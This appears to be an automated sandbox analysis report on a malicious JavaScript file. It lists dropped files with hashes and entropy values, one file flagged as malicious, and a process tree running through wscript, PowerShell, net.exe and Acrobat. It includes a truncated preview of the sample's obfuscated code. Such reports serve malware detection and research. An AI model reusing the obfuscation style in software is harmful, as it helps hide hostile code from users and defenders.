SHA1: | 312776090B214F22DA846E0AFF060214E6B368C4 |
SHA-256: | 8D38DFB3081A1066EA639D436664690C81264BE15E440D6ED12823ED07A233B3 |
SHA-512: | 6163842D9B2DBBF9B4813A04213B98FEBE7F0121AF34F5A02A9C4FD14CE0015975FB1C486543FAF73F26FA3A74B59EE4A61C629427D45B2C9427B7530F34A894 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.300116561277612 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBSaraun0nZiQ0YdDoAvJf+dPeUkwRe9:YvXKXB9Z0c+sG28Ukee9 |
MD5: | 4F7D9D1115206EC01A48ACDB64DA6A4C |
SHA1: | 7FDAA04C80F4888E8A528E529CAFE70008BE7FD5 |
SHA-256: | 1FA52C278AC1C840E0BF1A7B528D36E476B66FD39D3202012559F8069FDA1CDF |
SHA-512: | 12D2485A51AA296008D424C1A80875AFBFE61BB202E3C03B55F4FC935C615357E159F702C0F420FB76257B53BA78CA0CA014B944F0719AEF97E01C6EAC211C46 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.297584983435132 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBSaraun0nZiQ0YdDoAvJfbPtdPeUkwRe9:YvXKXB9Z0c+sGDV8Ukee9 |
MD5: | A8B8A028BC7F0E9911B32E8AB901BB7F |
SHA1: | 565C10CE796CD04505B19E60988D06DFCF4E7134 |
SHA-256: | A9B3917C35A990380510B4D22913CFB503E3482B5E71D76EC517948DF0EB6190 |
SHA-512: | 3727B4B45315135E62863AB32CB168D1383B902505E2E35A99B66F9FD8B25E50BF2ED2AFA7126218A623467E1FD05B8125C12A3B16957372F60CCA3590483580 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.300847573113383 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBSaraun0nZiQ0YdDoAvJf21rPeUkwRe9:YvXKXB9Z0c+sG+16Ukee9 |
MD5: | D899CEC7BA42E28C5BE0C1F55A0F43BF |
SHA1: | 15553CF535026C209907B7A62110829EC91640A2 |
SHA-256: | 2AC17461935785334C70C3674017E679A2CDC61C6F7D512BFBF78D51E3F84490 |
SHA-512: | 2036540970289EF8347CC56FFEACB76743CE7C68B3645C89982DE533DC796C927C7CFF15D06C94CDD3F5A3173497D2EEBA2A72ECBE7AD4690494A314A16EECB0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.670125290474489 |
Encrypted: | false |
SSDEEP: | 24:Yv6XB5+5amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSxr:YvE2BgkDMUJUAh8cvMV |
MD5: | B0DC24CCFA6A02D5BF64CE7E126BBD24 |
SHA1: | 04657471D7CBEAC0C02917C7F6F05EB0A437C804 |
SHA-256: | BA6724E5DF713A1831DE8A92A72C9106FEFC2FB907C9F87A86793C98AAED7ECE |
SHA-512: | C3F02286D47972A2801A248D16B06C9ED701B9E7887F68283FFBED0922836AD011E78E43036D99F316895E4CABF5BABE7F930DFD315D9E94F7FD3D444EF50AA3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.277510819709129 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBSaraun0nZiQ0YdDoAvJfshHHrPeUkwRe9:YvXKXB9Z0c+sGUUUkee9 |
MD5: | A93B377EFC396A140FDD5BD739FE90CA |
SHA1: | A651A4E7F875A6A90ABD0966F520900151B37D8D |
SHA-256: | AAE605A087742FE04EB6BE1AD5AFBFA7E4B80EDBE0A7FA54DCBDB5B1E8F1591B |
SHA-512: | 61960616E3DC402BD4D268037BCD3291386A8467E749BFCBE1FAA29B3729F7A87D0BF90A18F97C36E2A2F8F8A13311F2AE34D60522B02DA854150D345B915710 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.277065963972667 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBSaraun0nZiQ0YdDoAvJTqgFCrPeUkwRe9:YvXKXB9Z0c+sGTq16Ukee9 |
MD5: | 9F6E9564CD5B7EE1E90753DE3A400AAB |
SHA1: | C983B270651E8C5C70A2B2FBF5CD1978C61E0302 |
SHA-256: | 3AC5D31946602D50DBA8B8F9CBB880E7A3D61C039E463F1AA1AEEAF350AF2C27 |
SHA-512: | 2CA28B3B0574EC76AC06016E01B21427D31F9CE449BF1536E612813761D53E551B8E4107A69578BA015932298FDB30C8D09A2FBC6ADA610044B1826A6412FCCD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.134367614190431 |
Encrypted: | false |
SSDEEP: | 24:Yjy53GaAaywCoJq2A68unKq3q1W3wUUPj4F1vj0Sqf2gyDC2YH2LSqRCycDLxvOy:YjeqV65KHT4F17GJVH+TMLx+PdsR9b |
MD5: | 1B7EFA51DEAC33D467F3994CE6B8305B |
SHA1: | 1F4C99626405B3C1779D26F20A14CED00528D526 |
SHA-256: | F19BB409D06F4E398597C56537F9F04B5647C75B0E6B30AD8E319350E2E96283 |
SHA-512: | A5A47C11FCCE04C92E745E8D47DCF27486B8A340E81593190CE8EE29C09D6BE3FBAC169F98DCBA10AC0865B9CAA0C6FEFE877ECDBE592C7B39470C70B779B279 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1454454664106573 |
Encrypted: | false |
SSDEEP: | 24:TLhx/XYKQvGJF7ursxRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHA:TFl2GL7ms9Xc+XcGNFlRYIX2v3kA |
MD5: | 5B4D55B587AB6188F90CDB625EAD9541 |
SHA1: | D699745671EB3BD9639044F48314C4B57DDA3A81 |
SHA-256: | 7DEC1B8C6147D28027D06DA176147D02AA85875A25EE4215410C1B6971F3F54B |
SHA-512: | E6C9442E3CEFCC8FEE10F29BF30C1A3E8304F084D43A1A17D392C34A51F4151A4D35FAF6B33F39D1C12D66D58C06A775AFB1ABB936961F163852107E7D14B1A2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.5517901613696425 |
Encrypted: | false |
SSDEEP: | 24:7+t1UXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxlWqLxx/XYKI:7MGXc+XcGNFlRYIX2v9qVl2GL7msQ |
MD5: | 9102ADB5CCD709FE1446B829FA1F7929 |
SHA1: | C0B78C1A2E1C4E90AA1371A95AEBEE458BE93CEC |
SHA-256: | DBA998E45B324BE9BE3A8B5478A64DFFF8EA0616F2514FF3AEA46DEEC9E7263C |
SHA-512: | 1EAF234D43A74581C4A9C905626F44C5B80B9EDAE52A2A253CBE90D013387E492D438D03DC22F483A46BBF56C707BBAC32CE88DA2E5FEE7DC5B082DCAF377728 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgJQWNzboMuPmKKFsiGuvtjgvi/bt7hVYyu:6a6TZ44ADEJQWuPmzs/umvi57PK |
MD5: | 7DF1899B53DACFBD4DE596ACC22A641E |
SHA1: | 4DA532EB9C3CA317002967D72EA38170F4264DD9 |
SHA-256: | D0013D8BA0C8CD2B618278B1823CEF049C540075564D0C8F8AB7CCD776CAC699 |
SHA-512: | 019145EF003F067AC0DA2EA0EFB8DB074246A1792A95FDA27698A77710CCB84BB7529C98607762D0A4B21677ECAE8FFE64181DC0C5DF781198AB3BCDCCFDB4A1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllulbnolz:NllUc |
MD5: | F23953D4A58E404FCB67ADD0C45EB27A |
SHA1: | 2D75B5CACF2916C66E440F19F6B3B21DFD289340 |
SHA-256: | 16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B |
SHA-512: | B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.504899586627176 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClEpI:Qw946cPbiOxDlbYnuRK+bDC |
MD5: | 8AAD375CCD2C45EF29AD0251FB30993C |
SHA1: | 6A67D3A3B2FC24E48E76191E4D96AAE94D18F07D |
SHA-256: | 4EDC6A32996D61127734FF8323B93EB5E74F927CEA1ACCB67D2189AECCC3B698 |
SHA-512: | D11D4922B955C42C93D94EF69E7B9FDFE4C340512B8072B7875AC1212C7FAA3DF3549B2390CA5AD1B7C36ADAA0D27762D80C473776FA6086DC236B23C6160014 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 11-48-12-481.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.338264912747007 |
Encrypted: | false |
SSDEEP: | 384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb |
MD5: | 128A51060103D95314048C2F32A15C66 |
SHA1: | EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB |
SHA-256: | 601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713 |
SHA-512: | 55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.346241356689555 |
Encrypted: | false |
SSDEEP: | 384:xYWQ/t635CX5KEL+q07KWhADSxXpoiSf5Sq+oA745+xgfgvQCfYAyzyPuqIycpRa:Brn |
MD5: | 9E3E26AEBB67FEBB9E2B75D4529E0027 |
SHA1: | 753BB1AD76A9195828469559D2ED01460C8E97A1 |
SHA-256: | 68ECE59555E2B970FE60F98420B8458F34490FE837352DFA5C7932FCAF6BB38B |
SHA-512: | 04AE7E1F1010A9A33C1392E675A99797E7CC8D26DF9EC982542D4FB5950F0AC390E0938F4C8B92B3811AD8DA07FFBAE58B8CA40F243502F41A3E9874538D84B3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.396896621814381 |
Encrypted: | false |
SSDEEP: | 192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcb4kcbqIcwcbd:V3fOCIdJDeytcj |
MD5: | 1F5F16C703A6EF3F530479C209122190 |
SHA1: | A580CC0F15FF612D8B139B853424DA5544F10AA6 |
SHA-256: | 0CC65780B8CD4B7B101843D6F76050D3647F60B7FC2EE9C9A0AA6B10CC316682 |
SHA-512: | E9270283918BA52295005A01986388254A82600CDE980E245440B4B20AF2DAE7748CF3BAF6EB2ADCB675F93D1ACC4C74C7D9EAF0E23E3348EC79B26F54B73A6C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/I+wYIGNP4bdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07mWL07oXGZd:LwZG6b3mlind9i4ufFXpAXkrfUs0CWLk |
MD5: | F5279DA3659F1FDF155BE793A409106A |
SHA1: | B389FCDB8832ABD4BC4A06CB7E97107FC5E139EA |
SHA-256: | 4926C6879266E3E2301A1823FE1FF8772B1FA7A33163224B1B5C2695A0E372CA |
SHA-512: | 07CA1BF523F22967695DF263E7477135C69F5B9F6B612B8037F9434C099F5BE132957DAC9619F13F97FDDD6A543E78D395755F7BB644B34D864C46239F7DDAD6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru |
MD5: | 95F182500FC92778102336D2D5AADCC8 |
SHA1: | BEC510B6B3D595833AF46B04C5843B95D2A0A6C9 |
SHA-256: | 9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9 |
SHA-512: | D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.92431536108012 |
TrID: | |
File name: | 2572722545251923438.js |
File size: | 19'554 bytes |
MD5: | 2f1a290ab7eb7fbbd34c065c8cb1cb3e |
SHA1: | 9aef2862944fbab0d40ffdf8388c42a43799de1e |
SHA256: | 18da79f5aa9c893d462e9322207c06254545cb027954058c6d092a23a6a3e9e2 |
SHA512: | fe24866da982fc26aeeee4322ddc04af4eb0c08e18fdcf6d59dc4ed1e1f8769dee10a49e168129767b9fdbcc7c3184bec13db72e576cdb7b9e6cd2494f9333c2 |
SSDEEP: | 384:5takg4hn/BcBwkzwrdNtGq4y6dIBK7boTkJvPa+WZv+o:5vjh/BcBHzwrdN0Hy6dTTWZv7 |
TLSH: | EF9224DD811EC48760D483FD7DCAB56672BC035DB4A8D0D878DB02AC6A53E76A0F24B6 |
File Content Preview: | function hjmrn(){aqwbes=[1031,3079,5127,4103,2055,3072];var wgjmurxv=this[odyocmpfb+dxxujph+kmfhlzjc+haacmli+noipqhv+mcfcqa+axmselix+ogqkqnvc](this[awuag+tssmzhd+rexnb+kmfhlzjc+nentlzcpo+odyocmpfb+ogqkqnvc][vglsux+kmfhlzjc+noipqhv+dxxujph+ogqkqnvc+noipqhv |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 11:48:02 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70aab0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 11:48:03 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6dc6a0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 11:48:03 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 11:48:03 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 11:48:09 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff651090000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 7 |
Start time: | 11:48:09 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6dc6a0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 11:48:09 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7be610000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 9 |
Start time: | 11:48:09 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 11:48:10 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7403e0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
